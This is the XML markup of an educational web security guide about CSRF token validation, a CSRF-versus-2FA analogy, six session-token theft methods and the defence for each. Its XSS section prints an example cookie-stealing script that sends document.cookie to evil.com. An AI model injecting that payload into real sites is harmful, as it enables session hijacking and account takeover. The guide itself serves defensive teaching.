    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">evil.com cannot read your-bank.com's HTML (CORS blocks cross-origin reads)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">evil.com cannot read your-bank.com's cookies (same-origin policy)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Any forged request arrives without a valid token and is rejected</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4.4 How the Server Validates the Token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Approach 1: Store in Session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">On page load: server generates token, saves it in your session, embeds in form</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">On submit: server compares submitted token against session-stored token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Match = valid request, Mismatch = rejected</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Approach 2: Double Submit Cookie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Server sets token as a cookie AND embeds it in the form body</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">On submit: server checks that cookie value equals body value</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hacker can trigger a request that sends your cookie but cannot read its value to also put it in the body</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4.5 CSRF vs 2FA — The Analogy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF protection is conceptually similar to 2FA — two independent proofs are required, not just one.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2FA</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CSRF Protection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First factor</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Password (who you are)</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Session cookie (who you are)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factor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 device (something you have)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CSRF token (where request came from)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When checked</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Once at login</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Every state-changing request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involvement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actively provides OTP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passed silently by form</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="10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5. How Hackers Steal Session Tokens</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A stolen session ID lets an attacker act as you — they don't need to know what's in the session. They just wear your identity badge and the server does the rest.</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Method 1: XSS — Cross-Site Scripting (Most Common)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If a site renders user input as HTML, an attacker injects a script that reads and exfiltrates your cookie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;fetch('https://evil.com/steal?c=' + document.cookie)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Defence: HttpOnly flag — makes the cookie completely invisible to JavaScript.</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Method 2: Man in the Middle (MITM)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">On an unsecured network (public WiFi), the attacker intercepts unencrypted traffic and reads the Cookie header directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Defence: Secure flag + HTTPS — cookie only sent over encrypted connections.</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Method 3: Network Sniffing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Similar to MITM but passive. Attacker runs tools like Wireshark on shared networks to capture all packets including cookie headers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Defence: HTTPS encrypts everything end-to-end.</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Method 4: Physical / Device Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Someone with access to your machine can open DevTools → Application → Cookies and read session IDs directly. Chrome also stores cookies in a SQLite file at a known path on disk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Defence: Full disk encryption, screen lock, short session expiry.</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Method 5: Subdomain Takeover</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If a cookie uses Domain=.bank.com, it is sent to all subdomains. If an old subdomain (e.g. test.bank.com) is abandoned but DNS still resolves, an attacker can claim that server and receive cookies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Defence: Clean up old subdomains, use strict domain scoping.</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Method 6: Session Fixation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker plants his own session ID on the victim before login. When the victim logs in, the server associates that known ID with the victim's account. Attacker then uses the same ID.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Defence: Always regenerate a fresh session ID after every successful login.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Defence Summary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Attack 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Exploits</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Defence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XSS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JS reading document.cookie</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HttpOnly flag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MITM / Sniffing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Unencrypted HTTP traffic</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Secure flag + HTTPS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Physical access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 browser or disk access</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Disk encryption, short expiry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Subdomain takeover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 cookie Domain scope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 domain, clean subdomains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Session fixation</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Server accepting client session ID</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Regenerate session ID on login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="2E75B6" w:sz="4" w:space="6"/>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The HttpOnly and Secure flags together eliminate the two most common attack vectors — always set both on any auth cookie.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Web Security &amp; Cookies Guide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2026-05-14T15:29:12.136Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-14T15:29:12.136Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>